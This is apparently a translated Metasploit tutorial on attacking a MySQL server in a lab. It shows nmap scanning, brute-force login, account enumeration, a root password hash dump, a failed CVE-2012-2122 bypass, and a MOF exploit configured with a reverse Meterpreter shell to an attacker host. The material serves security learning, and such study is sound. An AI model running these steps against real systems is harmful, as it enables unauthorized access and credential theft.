Use Metasploit to perform penetration testing on MySQL

Article Directory


Preface

This article details how to use metasploit to perform a simple penetration test on mysql


One, db_nmap scan

Both external and built-in are available. To use the built-in nmap of Metasploit, you need to start the postgresql service to use

1 Introduction to commonly used nmap parameters

Target discovery

-iL 添加扫描待ip列表文件
-iR 随机选择目标
不用指定目标ip,nmap对自动对全球的ip随机选择100个进行扫描
[email protected]:~# nmap -iR 100 -p100
--exclude 排除扫描
当想要对某个ip地址段进行扫描,但是并不扫描其中特定的一些ip
[email protected]:~# nmap 192.168.1.0/24 --exclude 192.168.1.1-100
从文件列表中排除不需要扫描的ip

Host discovery

-sn ping扫描,不扫描端口
-Pn 完全扫描(穿透防火墙)
-PS/PA/PU/PY[portlist],协议扫描,TCP,SYN/ACK,UDP or SCTP ,基于上述协议去进行扫描端口
-PO[protocol list] 使用ip协议扫描
-n/-R
-n:不进行nds解析
-R:对其进行反向解析
--dns-servers 更换DNS服务器
<serv1[,serv2],...>: Specify custom DNS servers
更换系统默认DNS服务器,以得到不同的扫描结果
[email protected]:~# nmap --dns-servers 8.8.8.8 www.sina.com
--traceroute 路由追踪,基本等同于traceroute命令
[email protected]:~# nmap www.baidu.com --traceroute -p80

Port discovery

-sS/sT/sA/sW/sM 基于TCP的端口发现
TCP SYN Connect() ACK Window Maimon scans
基于TCP的SYN 全连接 ACK 窗口 Maimon 扫描
-sU 基于UPD协议的扫描,但是UDP的扫描的准确率并不高
-sN/sF/sX 基于TCP的空/finish/xmas的扫描
--scanflags <flags>,其实以上对于TCP的扫描都是对tcpflags位的组合,所以我们自然是可以自定义组合的。
-sI 僵尸扫描,<zombie host[:probeport]>: Idle scan
-sY/sZ 基于SCTP协议(少用),SCTP INIT/COOKIE-ECHO scans
-b 基于FTP的中继扫描,<FTP relay host>: FTP bounce scan

Specify port and scan menu

-p 扫描特定类型端口/范围
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
--exclude-ports 排除不需扫描的端口范围
-F 快速扫描
Fast mode - Scan fewer ports than the default scan
-r 按顺序扫描
Scan ports consecutively - don't randomize
如果我们对1-1000个端口发起扫描,namp默认会在每次扫描中随机选择,-r会使namp按照从大到小的顺序进行。
只扫描常用端口的top n

Service/version detection

-sV会使用nmap中的大量特征库去进行探测比对
--version-intensity
虽然-sV会nmap会调用自身大量的特征库资料去进行匹配,但是这样势必会增加比对的时间成本,所以我们可以探测阶段扫描的强度去最大限度的节省扫描的时间成本。
--version-trace
对扫描过程进行跟踪,显示扫描的具体过程

2 specific process

┌──(root💀kali)-[~]
└─# service postgresql start
                                                                                                                                            
┌──(root💀kali)-[~]
└─# msfconsole
                                                  
               .;lxO0KXXXK0Oxl:.
           ,o0WMMMMMMMMMMMMMMMMMMKd,
        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo
  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
 oMMMMMMMMMMx.                    dMMMMMMMMMMx
.WMMMMMMMMM:                       :MMMMMMMMMM,
xMMMMMMMMMo                         lMMMMMMMMMO
NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd                        ,0MMMMMMMMMMK;
.WMMMMMMMMMc                         'OMMMMMM0,
 lMMMMMMMMMMk.                         .kMMO'
  dMMMMMMMMMMWd'                         ..
   cWMMMMMMMMMMMNxc'.                ##########
    .0MMMMMMMMMMMMMMMMWc            #+#    #+#
      ;0MMMMMMMMMMMMMMMo.          +:+
        .dNMMMMMMMMMMMMo          +#++:++#+
           'oOWMMMMMMMMo                +:+
               .,cdkO0K;        :+:    :+:                                
                                :::::::+:
                      Metasploit

       =[ metasploit v6.0.46-dev                          ]
+ -- --=[ 2135 exploits - 1140 auxiliary - 365 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Open an interactive Ruby terminal with 
irb

msf6 > db_nmap -sS -A 192.168.1.112
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-04 20:39 CST
[*] Nmap: Nmap scan report for 192.168.1.112
[*] Nmap: Host is up (0.00018s latency).
[*] Nmap: Not shown: 978 closed ports
[*] Nmap: PORT     STATE SERVICE     VERSION
[*] Nmap: 139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
[*] Nmap: 512/tcp  open  exec        netkit-rsh rexecd
[*] Nmap: 513/tcp  open  login?
[*] Nmap: 514/tcp  open  tcpwrapped
[*] Nmap: 1099/tcp open  java-rmi    GNU Classpath grmiregistry
[*] Nmap: 1524/tcp open  bindshell   Metasploitable root shell
[*] Nmap: 2049/tcp open  nfs         2-4 (RPC #100003)
[*] Nmap: 2121/tcp open  ftp         ProFTPD 1.3.1
[*] Nmap: 3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
[*] Nmap: | mysql-info:
[*] Nmap: |   Protocol: 10
[*] Nmap: |   Version: 5.0.51a-3ubuntu5
[*] Nmap: |   Thread ID: 3893
[*] Nmap: |   Capabilities flags: 43564
[*] Nmap: |   Some Capabilities: SupportsTransactions, Support41Auth, SupportsCompression, Speaks41ProtocolNew, LongColumnFlag, SwitchToSSLAfterHandshake, ConnectWithDatabase
[*] Nmap: |   Status: Autocommit
[*] Nmap: |_  Salt: )@EwKP0?+WU'_-]o8g"l


msf6 > services -u
Services
========

host            port  proto  name          state  info
----            ----  -----  ----          -----  ----
192.168.1.112   3306  tcp    mysql         open   MySQL 5.0.51a-3ubuntu5

msf6 > 

Because some codes are irrelevant to this article and take up space, so they are deleted, depending on the situation

Second, view the version

The auxiliary/scanner/mysql/mysql_version is used

1 Introduction function

       Name: MySQL Server Version Enumeration
     Module: auxiliary/scanner/mysql/mysql_version
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  kris katterjohn <[email protected]>

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS   192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    3306             yes       The target port (TCP)
  THREADS  200              yes       The number of concurrent threads (max one per host)

Description:
  Enumerates the version of MySQL servers.

There are three parameters, the first is the target ip, the second is the target port, and the third is the number of threads. The more the number, the faster, but not too many, it will burst!

2 specific process

msf6 > search mysql_version

Matching Modules
================

   #  Name                                   Disclosure Date  Rank    Check  Description
   -  ----                                   ---------------  ----    -----  -----------
   0  auxiliary/scanner/mysql/mysql_version                   normal  No     MySQL Server Version Enumeration


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_version

msf6 > use 0
msf6 auxiliary(scanner/mysql/mysql_version) > options

Module options (auxiliary/scanner/mysql/mysql_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    3306             yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/mysql/mysql_version) > setg rhosts 192.168.1.112
rhosts => 192.168.1.112
msf6 auxiliary(scanner/mysql/mysql_version) > setg threads 200
threads => 200
msf6 auxiliary(scanner/mysql/mysql_version) > run

[+] 192.168.1.112:3306    - 192.168.1.112:3306 is running MySQL 5.0.51a-3ubuntu5 (protocol 10)
[*] 192.168.1.112:3306    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Three, brute force password cracking

1 Introduction function

      Name: MySQL Login Utility
     Module: auxiliary/scanner/mysql/mysql_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Bernardo Damele A. G. <[email protected]>

Check supported:
  No

Basic options:
  Name              Current Setting  Required  Description
  ----              ---------------  --------  -----------
  BLANK_PASSWORDS   true             no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
  DB_ALL_PASS       false            no        Add all passwords in the current database to the list
  DB_ALL_USERS      false            no        Add all users in the current database to the list
  PASSWORD                           no        A specific password to authenticate with
  PASS_FILE         passwords.txt    no        File containing passwords, one per line
  Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS            192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT             3306             yes       The target port (TCP)
  STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
  THREADS           200              yes       The number of concurrent threads (max one per host)
  USERNAME          root             no        A specific username to authenticate as
  USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false            no        Try the username as the password for all users
  USER_FILE                          no        File containing usernames, one per line
  VERBOSE           true             yes       Whether to print output for all attempts

Description:
  This module simply queries the MySQL instance for a specific 
  user/pass (default is root with blank).

References:
  https://nvd.nist.gov/vuln/detail/CVE-1999-0502

There are several parameters that are very important, and some have been mentioned before.
One is password, database passwords, which are usually cracked passwords. If you know, then use this?
The second is that pass_file refers to a password dictionary, which is a txt file
username and user_file are the same

2 specific process

msf6 auxiliary(scanner/mysql/mysql_version) > search mysql_login

Matching Modules
================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  auxiliary/scanner/mysql/mysql_login                   normal  No     MySQL Login Utility


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_login

msf6 auxiliary(scanner/mysql/mysql_version) > use 0
msf6 auxiliary(scanner/mysql/mysql_login) > options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             3306             yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           200              yes       The number of concurrent threads (max one per host)
   USERNAME          root             no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf6 auxiliary(scanner/mysql/mysql_login) > setg pass_file passwords.txt
pass_file => passwords.txt
msf6 auxiliary(scanner/mysql/mysql_login) > exploit

I won’t go into details about the brute force cracking process here, it’s too much

Fourth, collect information

1 Enumerate database information

①Introduction function

 Name: MySQL Enumeration Module
     Module: auxiliary/admin/mysql/mysql_enum
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Carlos Perez <[email protected]>

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD  qwer             no        The password for the specified username
  RHOSTS    192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     3306             yes       The target port (TCP)
  USERNAME  root             no        The username to authenticate as

Description:
  This module allows for simple enumeration of MySQL Database Server 
  provided proper credentials to connect remotely.

References:
  https://cisecurity.org/benchmarks.html

The main function of this module is to allow simple enumeration of MySQL database servers and provide correct credentials to connect remotely.

②The specific process

Use auxiliary/admin/mysql/mysql_enum

msf6 auxiliary(scanner/mysql/mysql_login) > search mysql_enum

Matching Modules
================

   #  Name                              Disclosure Date  Rank    Check  Description
   -  ----                              ---------------  ----    -----  -----------
   0  auxiliary/admin/mysql/mysql_enum                   normal  No     MySQL Enumeration Module


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/mysql/mysql_enum

msf6 auxiliary(scanner/mysql/mysql_login) > use 0
msf6 auxiliary(admin/mysql/mysql_enum) > options

Module options (auxiliary/admin/mysql/mysql_enum):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS    192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     3306             yes       The target port (TCP)
   USERNAME                   no        The username to authenticate as

msf6 auxiliary(admin/mysql/mysql_enum) > setg username root
username => root
msf6 auxiliary(admin/mysql/mysql_enum) > setg password qwer
password => qwer
msf6 auxiliary(admin/mysql/mysql_enum) > run
[*] Running module against 192.168.1.112

[*] 192.168.1.112:3306 - Running MySQL Enumerator...
[*] 192.168.1.112:3306 - Enumerating Parameters
[*] 192.168.1.112:3306 -        MySQL Version: 5.0.51a-3ubuntu5
[*] 192.168.1.112:3306 -        Compiled for the following OS: debian-linux-gnu
[*] 192.168.1.112:3306 -        Architecture: i486
[*] 192.168.1.112:3306 -        Server Hostname: metasploitable
[*] 192.168.1.112:3306 -        Data Directory: /var/lib/mysql/
[*] 192.168.1.112:3306 -        Logging of queries and logins: OFF
[*] 192.168.1.112:3306 -        Old Password Hashing Algorithm OFF
[*] 192.168.1.112:3306 -        Loading of local files: ON
[*] 192.168.1.112:3306 -        Deny logins with old Pre-4.1 Passwords: OFF
[*] 192.168.1.112:3306 -        Allow Use of symlinks for Database Files: YES
[*] 192.168.1.112:3306 -        Allow Table Merge: YES
[*] 192.168.1.112:3306 -        SSL Connections: Enabled
[*] 192.168.1.112:3306 -        SSL CA Certificate: /etc/mysql/cacert.pem
[*] 192.168.1.112:3306 -        SSL Key: /etc/mysql/server-key.pem
[*] 192.168.1.112:3306 -        SSL Certificate: /etc/mysql/server-cert.pem
[*] 192.168.1.112:3306 - Enumerating Accounts:
[*] 192.168.1.112:3306 -        List of Accounts with Password Hashes:
[+] 192.168.1.112:3306 -                User: debian-sys-maint Host:  Password Hash: 
[+] 192.168.1.112:3306 -                User: root Host: % Password Hash: *2491CA5000A9614AA28C39036702D965584486EC
[+] 192.168.1.112:3306 -                User: guest Host: % Password Hash: 
[*] 192.168.1.112:3306 -        The following users have GRANT Privilege:
[*] 192.168.1.112:3306 -                User: debian-sys-maint Host: 
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mysql/mysql_enum) > 

2 Export password hash

①Introduction function

Name: MYSQL Password Hashdump
     Module: auxiliary/scanner/mysql/mysql_hashdump
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  theLightCosine <[email protected]>

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD  qwer             no        The password for the specified username
  RHOSTS    192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     3306             yes       The target port (TCP)
  THREADS   200              yes       The number of concurrent threads (max one per host)
  USERNAME  root             no        The username to authenticate as

Description:
  This module extracts the usernames and encrypted password hashes 
  from a MySQL server and stores them for later cracking.

This function can export the account password hash, emm, and, under the authority of the currently logged in user,

②The specific process

msf6 auxiliary(admin/mysql/mysql_enum) > search mysql_hashdump

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  auxiliary/scanner/mysql/mysql_hashdump                   normal  No     MYSQL Password Hashdump
   1  auxiliary/analyze/crack_databases                        normal  No     Password Cracker: Databases


Interact with a module by name or index. For example info 1, use 1 or use auxiliary/analyze/crack_databases

msf6 auxiliary(admin/mysql/mysql_enum) > sue 0
[-] Unknown command: sue.
msf6 auxiliary(admin/mysql/mysql_enum) > use 0
msf6 auxiliary(scanner/mysql/mysql_hashdump) > options

Module options (auxiliary/scanner/mysql/mysql_hashdump):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  qwer             no        The password for the specified username
   RHOSTS    192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     3306             yes       The target port (TCP)
   THREADS   200              yes       The number of concurrent threads (max one per host)
   USERNAME  root             no        The username to authenticate as

msf6 auxiliary(scanner/mysql/mysql_hashdump) > run

[+] 192.168.1.112:3306    - Saving HashString as Loot: debian-sys-maint:
[+] 192.168.1.112:3306    - Saving HashString as Loot: root:*2491CA5000A9614AA28C39036702D965584486EC
[+] 192.168.1.112:3306    - Saving HashString as Loot: guest:
[*] 192.168.1.112:3306    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/mysql/mysql_hashdump) > 

Five, mysql authentication vulnerability exploitation

1 Introduction function

 Name: MySQL Authentication Bypass Password Dump
     Module: auxiliary/scanner/mysql/mysql_authbypass_hashdump
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2012-06-09

Provided by:
  theLightCosine <[email protected]>
  jcran <[email protected]>

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  RHOSTS    192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     3306             yes       The target port (TCP)
  THREADS   200              yes       The number of concurrent threads (max one per host)
  USERNAME  root             yes       The username to authenticate as

Description:
  This module exploits a password bypass vulnerability in MySQL in 
  order to extract the usernames and encrypted password hashes from a 
  MySQL server. These hashes are stored as loot for later cracking.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2012-2122
  OSVDB (82804)
  https://blog.rapid7.com/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql

This module uses CVE-2012-2122. One was found during a test of NetEase and submitted to NSRC.

Probability login vulnerability of any user password in mysql, according to the announcement, it can be verified once about 256 times. All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.

CVE ID: CVE-2012-2122
MariaDB is a database server that provides occasional alternatives to MySQL. MySQL is an open source database.
MariaDB 5.1.62, 5.2.12, 5.3.6, 5.5.23 versions before and MySQL 5.1.63, 5.5.24, 5.6.6 versions
before have security vulnerabilities in the handling of user authentication, which may cause attackers to not need to know the correctness The password can log in to the MySQL server.
After the user connects to MariaDB/MySQL, the application will calculate and compare the token value. Due to the wrong conversion, even if memcmp() returns a non-zero value, a wrong comparison may occur, causing MySQL/MariaDB to mistakenly believe that the password is correct, because The protocol uses random strings, and the probability of the bug occurring is 1/256. Whether the version of MySQL is affected depends on the way the program is compiled, and many versions (including official binary files) are not affected by this vulnerability.
In other words, as long as you know the user name and keep trying, you can log in to the SQL database directly. According to the announcement, about 256 times can be correct once.

2 specific process

msf6 auxiliary(scanner/mysql/mysql_hashdump) > search mysql_auth

Matching Modules
================

   #  Name                                               Disclosure Date  Rank    Check  Description
   -  ----                                               ---------------  ----    -----  -----------
   0  auxiliary/scanner/mysql/mysql_authbypass_hashdump  2012-06-09       normal  No     MySQL Authentication Bypass Password Dump


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_authbypass_hashdump

msf6 auxiliary(scanner/mysql/mysql_hashdump) > use 0
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > options

Module options (auxiliary/scanner/mysql/mysql_authbypass_hashdump):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   RHOSTS    192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     3306             yes       The target port (TCP)
   THREADS   200              yes       The number of concurrent threads (max one per host)
   USERNAME  root             yes       The username to authenticate as

msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run

[+] 192.168.1.112:3306    - 192.168.1.112:3306 The server allows logins, proceeding with bypass test
[*] 192.168.1.112:3306    - 192.168.1.112:3306 Authentication bypass is 10% complete
[*] 192.168.1.112:3306    - 192.168.1.112:3306 Authentication bypass is 20% complete
[*] 192.168.1.112:3306    - 192.168.1.112:3306 Authentication bypass is 30% complete
[*] 192.168.1.112:3306    - 192.168.1.112:3306 Authentication bypass is 40% complete
[*] 192.168.1.112:3306    - 192.168.1.112:3306 Authentication bypass is 50% complete
[*] 192.168.1.112:3306    - 192.168.1.112:3306 Authentication bypass is 60% complete
[*] 192.168.1.112:3306    - 192.168.1.112:3306 Authentication bypass is 70% complete
[*] 192.168.1.112:3306    - 192.168.1.112:3306 Authentication bypass is 80% complete
[*] 192.168.1.112:3306    - 192.168.1.112:3306 Authentication bypass is 90% complete
[*] 192.168.1.112:3306    - 192.168.1.112:3306 Authentication bypass is 100% complete
[-] 192.168.1.112:3306    - 192.168.1.112:3306 Unable to bypass authentication, this target may not be vulnerable
[*] 192.168.1.112:3306    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Sixth, Mof right escalation

1 Introduction function

Name: Oracle MySQL for Microsoft Windows MOF Execution
     Module: exploit/windows/mysql/mysql_mof
   Platform: Windows
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2012-12-01

Provided by:
  kingcope
  sinn3r <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   MySQL on Windows prior to Vista

Check supported:
  Yes

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD  qwer             yes       The password to authenticate with
  RHOSTS    192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     3306             yes       The target port (TCP)
  USERNAME  root             yes       The username to authenticate as

Payload information:

Description:
  This module takes advantage of a file privilege misconfiguration 
  problem specifically against Windows MySQL servers (due to the use 
  of a .mof file). This may result in arbitrary code execution under 
  the context of SYSTEM. This module requires a valid MySQL account on 
  the target machine.
  此模块利用文件权限配置错误专门针对Windows MySQL服务器的问题(由于使用.mof文件)。
  这可能导致在以下情况下执行任意代码:系统的上下文。此模块需要上的有效MySQL帐户。

目标机器。

References:
  https://nvd.nist.gov/vuln/detail/CVE-2012-5613
  OSVDB (88118)
  https://www.exploit-db.com/exploits/23083
  https://seclists.org/fulldisclosure/2012/Dec/13

2 specific process

sf6 exploit(multi/mysql/mysql_udf_payload) > search mysql_

Matching Modules
================

   #   Name                                               Disclosure Date  Rank       Check  Description
   -   ----                                               ---------------  ----       -----  -----------
   0   auxiliary/scanner/mysql/mysql_writable_dirs                         normal     No     MYSQL Directory Write Test
   1   auxiliary/scanner/mysql/mysql_file_enum                             normal     No     MYSQL File/Directory Enumerator
   2   auxiliary/scanner/mysql/mysql_hashdump                              normal     No     MYSQL Password Hashdump
   3   auxiliary/scanner/mysql/mysql_schemadump                            normal     No     MYSQL Schema Dump
   4   auxiliary/scanner/mysql/mysql_authbypass_hashdump  2012-06-09       normal     No     MySQL Authentication Bypass Password Dump
   5   auxiliary/admin/mysql/mysql_enum                                    normal     No     MySQL Enumeration Module
   6   auxiliary/scanner/mysql/mysql_login                                 normal     No     MySQL Login Utility
   7   auxiliary/admin/mysql/mysql_sql                                     normal     No     MySQL SQL Generic Query
   8   auxiliary/scanner/mysql/mysql_version                               normal     No     MySQL Server Version Enumeration
   9   exploit/linux/mysql/mysql_yassl_getname            2010-01-25       good       No     MySQL yaSSL CertDecoder::GetName Buffer Overflow
   10  exploit/linux/mysql/mysql_yassl_hello              2008-01-04       good       No     MySQL yaSSL SSL Hello Message Buffer Overflow
   11  exploit/windows/mysql/mysql_yassl_hello            2008-01-04       average    No     MySQL yaSSL SSL Hello Message Buffer Overflow
   12  exploit/multi/mysql/mysql_udf_payload              2009-01-16       excellent  No     Oracle MySQL UDF Payload Execution
   13  exploit/windows/mysql/mysql_start_up               2012-12-01       excellent  Yes    Oracle MySQL for Microsoft Windows FILE Privilege Abuse
   14  exploit/windows/mysql/mysql_mof                    2012-12-01       excellent  Yes    Oracle MySQL for Microsoft Windows MOF Execution
   15  auxiliary/analyze/crack_databases                                   normal     No     Password Cracker: Databases
   16  auxiliary/admin/http/rails_devise_pass_reset       2013-01-28       normal     No     Ruby on Rails Devise Authentication Password Reset


Interact with a module by name or index. For example info 16, use 16 or use auxiliary/admin/http/rails_devise_pass_reset

msf6 exploit(multi/mysql/mysql_udf_payload) > use 14
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/mysql/mysql_mof) > options

Module options (exploit/windows/mysql/mysql_mof):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  qwer             yes       The password to authenticate with
   RHOSTS    192.168.1.112    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     3306             yes       The target port (TCP)
   USERNAME  root             yes       The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   MySQL on Windows prior to Vista

However, because the attack payload does not support the Linux system, the attack was not successful.


to sum up

This article describes in detail the method of using Metasploit to perform penetration testing on mysql, for learning purposes only.